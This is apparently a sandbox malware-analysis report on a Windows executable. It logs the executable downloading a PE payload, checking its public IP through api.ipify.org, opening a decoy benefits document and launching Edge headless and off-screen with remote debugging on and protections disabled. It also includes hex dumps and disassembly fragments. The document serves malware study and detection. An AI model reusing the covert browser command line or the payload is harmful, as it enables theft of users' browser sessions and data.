                                                                                                                                                                                    2025-01-14 12:13:11 UTC500INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 50 75 74 6b 31 35 30 44 4d 76 52 70 4a 43 37 61 53 36 4b 32 68 4a 77 67 33 48 55 41 42 7a 56 7a 47 76 35 73 6e 30 7a 36 74 57 25 32 46 30 4d 35 7a 71 69 77 68 71 4a 58 42 31 6e 30 34 6f 5a 77 44 62 35 52 46 30 75 39 59 72 46 66 64 35 4c 4f 49 69 34 63 41 75 25 32 46 45 66 61 77 78 51 46 6e 58 73 7a 58 76 67 38 77 6a 33 46 77 37 6c 65 45 43 53 63 4a 4b 4b 45 33 25 32 46 75 62 34 36 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Putk150DMvRpJC7aS6K2hJwg3HUABzVzGv5sn0z6tW%2F0M5zqiwhqJXB1n04oZwDb5RF0u9YrFfd5LOIi4cAu%2FEfawxQFnXszXvg8wj3Fw7leECScJKKE3%2Fub46U%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                    2025-01-14 12:13:11 UTC961INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e b6 df 42 0a d7 b1 11 0a d7 b1 11 0a d7 b1 11 41 af b2 10 1e d7 b1 11 41 af b4 10 99 d7 b1 11 41 af b5 10 2b d7 b1 11 41 af b0 10 09 d7 b1 11 0a d7 b0 11 83 d7 b1 11 58 a2 b4 10 2a d7 b1 11 58 a2 b5 10 04 d7 b1 11 58 a2 b2 10 00 d7 b1 11 c7 a2 b5 10 08 d7 b1 11 c7 a2 b1 10 0b d7 b1 11 c7 a2 4e 11 0b d7 b1 11 c7 a2 b3 10 0b d7 b1 11 52 69 63 68 0a d7 b1 11 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NBAAA+AX*XXNRich
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 5c 24 08 57 48 83 ec 20 48 8b 39 48 8b d9 e8 7b aa 0a 00 48 8b 4b 38 e8 82 9f 01 00 48 8b cb e8 fa 3b 01 00 83 47 58 ff 75 17 80 7f 28 00 75 11 48 8b 4f 70 48 c7 47 70 00 00 00 00 e8 fd 2d 02 00 48 8b 5c 24 30 33 c0 48 83 c4 20 5f c3 0f b6 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 e8 32 a8 12 00 85 c0 75 1d 8d 48 08 e8 46 0f 0f 00 48 85 c0 74 10 33 c9 48 89 08 48 89 03 33 c0 48 83 c4 20 5b c3 b8 07 00 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 48 83 ec 28 e8 77 3b 01 00 33 c0 48 83 c4 28 c3 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49
                                                                                                                                                                                    Data Ascii: H\$WH H9H{HK8H;GXu(uHOpHGp-H\$03H _A@SH I2uHFHt3HH3H [H [H(w;3H(H\$Ht$WH I
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 83 fd 65 41 0f 44 ec 8b c5 eb ca cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 48 89 58 10 4c 89 40 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 60 4c 8b 29 33 ed 0f 29 70 b8 4d 8b f0 0f 29 78 a8 8b da 44 0f 29 40 98 4c 8b e1 41 ff 45 48 44 8b fd 49 63 f9 48 89 68 08 e8 19 a5 0a 00 41 89 5c 24 0c 83 fb 01 0f 85 91 01 00 00 48 8b b4 24 c0 00 00 00 48 8b 0e e8 7b af 01 00 48 8b 1e 44 8b f5 48 8d 2d 8e 85 16 00 48 8b f8 0f b7 4b 14 83 e1 3f 0f b6 04 29 83 f8 03 75 15 33 d2 48 8b cb e8 c1 d9 02 00 0f b7 43 14 83 e0 3f 0f b6 04 28 83 f8 01 74 4e 83 f8 02 75 3c 48 8b 0e 0f b7 41 14 a8 08 74 06 f2 0f 10 01 eb 1c a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 0e a8 12 74 07 e8 04 9f 09 00 eb 03 0f 57 c0 0f 28 c8 48 8b cf e8 34 e7 0e 00 85 c0 74 0d 33 db 41 c6 44 24 08 01 e9
                                                                                                                                                                                    Data Ascii: eADHHXL@UVWATAUAVAWH`L)3)pM)xD)@LAEHDIcHhA\$H$H{HDH-HK?)u3HC?(tNu<HAt$tWH*tW(H4t3AD$
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: c7 76 05 49 8b c3 eb 17 f2 48 0f 2c c0 eb 10 a8 12 74 68 48 83 79 08 00 74 61 e8 3e 9a 09 00 0f 57 c0 48 b9 00 00 00 00 00 00 01 00 f2 48 0f 2a c0 f2 0f 11 44 3b 08 48 3b c1 7d 13 48 b9 00 00 00 00 00 00 ff ff 48 3b c1 0f 8f b3 00 00 00 8b 44 3b 04 83 f8 43 75 0d c7 44 3b 04 42 00 00 00 e9 9d 00 00 00 83 f8 45 0f 85 94 00 00 00 c7 44 3b 04 44 00 00 00 e9 87 00 00 00 48 c7 44 3b 08 00 00 00 00 e9 79 00 00 00 83 fa 02 75 48 4b 8b 0c f9 0f b7 41 14 a8 08 74 0c f2 0f 10 01 f2 0f 11 44 3b 08 eb 5c a8 24 74 10 0f 57 c0 f2 48 0f 2a 01 f2 0f 11 44 3b 08 eb 48 a8 12 74 0d e8 ca 99 09 00 f2 0f 11 44 3b 08 eb 37 f2 0f 11 74 3b 08 0f 28 c6 eb 2c 48 c7 44 3b 08 00 00 00 00 83 fa 05 75 0a c7 44 3b 04 40 00 00 00 eb 14 33 c0 41 80 e8 42 41 80 f8 01 0f 97 c0 83 c0 3f 89
                                                                                                                                                                                    Data Ascii: vIH,thHyta>WHH*D;H;}HH;D;CuD;BED;DHD;yuHKAtD;\$tWH*D;HtD;7t;(,HD;uD;@3ABA?
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 43 40 33 c0 48 8b 4c 24 50 48 33 cc e8 e3 9a 14 00 4c 8d 5c 24 60 49 8b 5b 30 49 8b 6b 40 49 8b 73 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 90 96 1e 00 00 9d 1e 00 00 a4 1e 00 00 a8 1e 00 00 af 1e 00 00 b3 1e 00 00 e3 1e 00 00 00 06 01 06 06 06 02 06 06 06 06 06 06 06 03 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 04 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 05 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 49 8b f0 48 8b da 8b f9 e8 24 98 12 00 85 c0 0f 85 22 01 00 00 b9 88 00 00 00 e8 32 ff 0e 00 4c 8b c8 48 85 c0 0f 84 0c 01 00 00 0f 57 c0 33 c0 41 0f 11 01 41 0f 11 41 10 41 0f 11 41 20 41 0f 11 41 30 41 0f 11 41 40 41 0f 11 41 50 41 0f 11 41 60 41 0f 11 41 70 49 89 81 80 00
                                                                                                                                                                                    Data Ascii: C@3HL$PH3L\$`I[0Ik@IsHIA_A^A]A\_H\$Ht$WH IH$"2LHW3AAAAA AA0AA@AAPAA`AApI
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 8b 8c 24 80 00 00 00 48 89 01 eb 30 48 8b 8c 24 88 00 00 00 48 8d 15 20 b9 16 00 4c 8b c3 e8 18 1c 0d 00 bb 01 00 00 00 48 8b 4c 24 28 48 85 c9 74 0a 49 8b 45 10 ff 15 97 1e 16 00 49 8b ce e8 b7 26 01 00 4c 8b 7c 24 30 8b c3 4c 8b 64 24 78 48 8b 7c 24 70 48 8b 6c 24 60 48 83 c4 38 41 5e 41 5d 5e 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 18 48 8b d9 48 8b 49 20 48 8b 40 10 ff 15 4d 1e 16 00 48 8b cb e8 6d 26 01 00 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc 44 8b 02 33 c9 45 85 c0 7e 24 48 8b 42 08 48 83 c0 04 80 78 01 00 74 0b 83 78 fc 00 75 05 80 38 02 74 15 ff c1 48 83 c0 0c 41 3b c8 7c e4 c7 42 28 00 00 00 00 33 c0 c3 48 8b 42 20 48 63 c9 c7 42 28 01 00 00 00 c7 04 c8 01 00 00 00 48 8b 42 20 c6 44 c8 04 01 48 b8 00 00 00 00 00 00 f0 3f 48 89 42 40
                                                                                                                                                                                    Data Ascii: $H0H$H LHL$(HtIEI&L|$0Ld$xH|$pHl$`H8A^A]^[@SH HAHHI H@MHm&3H [D3E~$HBHxtxu8tHA;|B(3HB HcB(HB DH?HB@
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 83 c3 18 41 83 fa 50 72 c9 48 8b 7c 24 10 b8 0c 00 00 00 5b c3 4b 8d 0c 52 48 8b 44 cf 10 48 85 c0 75 0a 48 8b 44 cf 08 48 89 44 cf 10 48 85 db 48 0f 44 d8 33 c0 48 89 5c cf 08 48 8b 7c 24 10 5b c3 48 89 5c 24 08 48 8d 1d 34 a5 19 00 4c 8b da 4c 8b d3 45 33 c9 66 66 66 0f 1f 84 00 00 00 00 00 4d 8b 02 49 8b c3 4d 2b c3 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 00 2b d1 75 07 48 ff c0 85 c9 75 ed 85 d2 74 15 41 ff c1 49 83 c2 18 41 83 f9 50 72 cc 33 c0 48 8b 5c 24 08 c3 4b 8d 04 49 48 8b 44 c3 08 48 8b 5c 24 08 c3 cc cc cc cc cc 40 57 48 8d 3d c7 a4 19 00 4c 8b da 41 b8 ff ff ff ff 48 85 d2 74 51 48 89 5c 24 10 45 33 c0 48 8d 1d 12 ac 19 00 4c 8b d7 0f 1f 80 00 00 00 00 4d 8b 0a 49 8b c3 4d 2b cb 0f 1f 80 00 00 00 00 0f b6 10 42 0f b6 0c 08 2b d1 75 07 48
                                                                                                                                                                                    Data Ascii: APrH|$[KRHDHuHDHDHHD3H\H|$[H\$H4LLE3fffMIM+B+uHutAIAPr3H\$KIHDH\$@WH=LAHtQH\$E3HLMIM+B+uH
                                                                                                                                                                                    2025-01-14 12:13:11 UTC1369INData Raw: 48 8b 8e 88 00 00 00 e8 ed 6d 01 00 48 8b 8e 88 00 00 00 8b d8 e8 9f 80 01 00 83 fb 64 44 8b e0 48 8d 1d 02 d0 ff ff 75 20 48 8b 46 18 0f b6 48 6c 80 bc 19 f3 9c 16 00 05 48 8b ce 75 18 48 8b d7 e8 c3 c6 0a 00 44 8b e0 41 b8 01 00 00 00 44 89 44 24 20 eb 11 33 d2 e8 2c c4 0a 00 e9 5a 03 00 00 48 8b 7c 24 40 49 8b 0f 0f b7 51 14 8b c2 83 e0 3f 80 bc 18 30 9b 16 00 05 74 5f 0f b7 c2 a8 24 74 05 4c 8b 29 eb 40 a8 08 74 25 f2 0f 10 01 66 44 0f 2f d8 77 31 66 41 0f 2f c2 76 0c 49 bd ff ff ff ff ff ff ff 7f eb 1e f2 4c 0f 2c e8 eb 17 a8 12 74 10 48 39 69 08 74 0a e8 38 84 09 00 4c 8b e8 eb 03 4c 8b ed 49 8b d5 48 8b ce e8 35 c6 0a 00 44 8b 44 24 20 44 8b e0 45 85 e4 0f 85 da 02 00 00 41 83 fe 01 0f 8e d0 02 00 00 48 89 6c 24 28 45 85 c0 0f 85 87 00 00 00 48 8b
                                                                                                                                                                                    Data Ascii: HmHdDHu HFHlHuHDADD$ 3,ZH|$@IQ?0t_$tL)@t%fD/w1fA/vIL,tH9it8LLIH5DD$ DEAHl$(EH


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.1150005104.26.12.2054437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:13:14 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                    2025-01-14 12:13:14 UTC423INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:14 GMT
                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                    Content-Length: 12
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 901d89f33b88efa3-EWR
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1852&rtt_var=926&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4176&recv_bytes=677&delivery_rate=303850&cwnd=135&unsent_bytes=0&cid=55b54e20df563dd5&ts=149&x=0"
                                                                                                                                                                                    2025-01-14 12:13:14 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                    Data Ascii: 8.46.123.189


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.1150006104.26.12.2054437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:13:14 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                    2025-01-14 12:13:14 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:14 GMT
                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                    Content-Length: 12
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 901d89f708f342f8-EWR
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1726&rtt_var=668&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1612368&cwnd=234&unsent_bytes=0&cid=7baf33b5324e2e2c&ts=150&x=0"
                                                                                                                                                                                    2025-01-14 12:13:14 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                    Data Ascii: 8.46.123.189


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.1150008104.26.12.2054437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:13:15 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                    2025-01-14 12:13:15 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:15 GMT
                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                    Content-Length: 12
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 901d89fe796a7cf3-EWR
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1788&rtt_var=682&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=677&delivery_rate=1591280&cwnd=218&unsent_bytes=0&cid=e29c6cbcf9841f26&ts=146&x=0"
                                                                                                                                                                                    2025-01-14 12:13:15 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                    Data Ascii: 8.46.123.189


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.1150009104.26.12.2054437760C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-14 12:13:16 UTC39OUTGET / HTTP/1.1
                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                    2025-01-14 12:13:16 UTC424INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Tue, 14 Jan 2025 12:13:16 GMT
                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                    Content-Length: 12
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 901d8a022d5bf5f8-EWR
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1586&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=677&delivery_rate=1801357&cwnd=122&unsent_bytes=0&cid=16d0a33186e05cba&ts=144&x=0"
                                                                                                                                                                                    2025-01-14 12:13:16 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                    Data Ascii: 8.46.123.189


                                                                                                                                                                                    Statistics

                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:07:12:19
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Users\user\Desktop\hJ1bl8p7dJ.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\hJ1bl8p7dJ.exe"
                                                                                                                                                                                    Imagebase:0x7ff7d2190000
                                                                                                                                                                                    File size:26'345'984 bytes
                                                                                                                                                                                    MD5 hash:73D8502F47E5C7B9B4851EE47692105C
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:07:12:19
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff68cce0000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:07:12:20
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9723 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:07:12:20
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1600 --field-trial-handle=1472,i,8808784561077415658,3538669664059517056,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:07:12:21
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                    File size:1'620'872 bytes
                                                                                                                                                                                    MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:07:12:45
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9230 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    General

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:07:12:45
                                                                                                                                                                                    Start date:14/01/2025
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1604 --field-trial-handle=1412,i,17015067578929256214,2434644396816959813,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                    Imagebase:0x7ff740fe0000
                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:1.2%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:18.4%
                                                                                                                                                                                      Total number of Nodes:719
                                                                                                                                                                                      Total number of Limit Nodes:105
                                                                                                                                                                                      execution_graph 106808 7ffeee116570 106811 7ffeee1f1b00 106808->106811 106810 7ffeee116597 106812 7ffeee1f1b7e 106811->106812 106813 7ffeee1f1b2b 106811->106813 106812->106813 106814 7ffeee1f1b9e 106812->106814 106865 7ffeee128730 11 API calls _raise_excf 106813->106865 106815 7ffeee1f1b43 106814->106815 106821 7ffeee1f1ba3 _raise_excf 106814->106821 106866 7ffeee128730 11 API calls _raise_excf 106815->106866 106818 7ffeee1f1b6d 106818->106810 106820 7ffeee1f1c31 _raise_excf 106822 7ffeee1f1c70 106820->106822 106868 7ffeee12ee90 11 API calls _raise_excf 106820->106868 106821->106820 106825 7ffeee1fbaa0 106821->106825 106867 7ffeee1fe910 11 API calls 2 library calls 106821->106867 106822->106810 106826 7ffeee1fbb0f new[] 106825->106826 106827 7ffeee1fbb89 106826->106827 106839 7ffeee1fbba7 _raise_excf 106826->106839 106889 7ffeee1c8ea0 11 API calls _raise_excf 106827->106889 106829 7ffeee1fbc7b 106830 7ffeee1fbc97 106829->106830 106890 7ffeee21ec40 106829->106890 106832 7ffeee1fbdc1 106830->106832 106835 7ffeee1fbcae 106830->106835 106869 7ffeee200440 106832->106869 106837 7ffeee1fbcb7 106835->106837 106838 7ffeee1fbd04 _raise_excf 106835->106838 106836 7ffeee1fc0b6 _raise_excf 106836->106821 106895 7ffeee1c9000 11 API calls _raise_excf 106837->106895 106854 7ffeee200440 _raise_excf 12 API calls 106838->106854 106863 7ffeee1fbd64 _raise_excf 106838->106863 106839->106829 106843 7ffeee1fbcdf 106839->106843 106841 7ffeee1fbccb 106896 7ffeee12ee90 11 API calls _raise_excf 106841->106896 106897 7ffeee1c9000 11 API calls _raise_excf 106843->106897 106844 7ffeee1fbe54 106845 7ffeee1fbeba 106844->106845 106849 7ffeee1fbeb2 106844->106849 106903 7ffeee21cc90 36 API calls _raise_excf 106844->106903 106850 7ffeee1fbecc 106845->106850 106851 7ffeee1fbf50 106845->106851 106846 7ffeee1fbe79 106846->106844 106902 7ffeee1b22f0 32 API calls _raise_excf 106846->106902 106847 7ffeee1fbf76 106860 7ffeee1fbb9a _raise_excf 106847->106860 106907 7ffeee2328b0 11 API calls _raise_excf 106847->106907 106904 7ffeee20eeb0 11 API calls _raise_excf 106849->106904 106905 7ffeee1c9000 11 API calls _raise_excf 106850->106905 106851->106860 106906 7ffeee1c8e50 11 API calls _raise_excf 106851->106906 106857 7ffeee1fbd45 106854->106857 106857->106863 106898 7ffeee114c20 106857->106898 106908 7ffeee1f55a0 11 API calls _raise_excf 106860->106908 106861 7ffeee1fbedd 106861->106860 106864 7ffeee114c20 _raise_excf 11 API calls 106861->106864 106863->106844 106863->106846 106863->106847 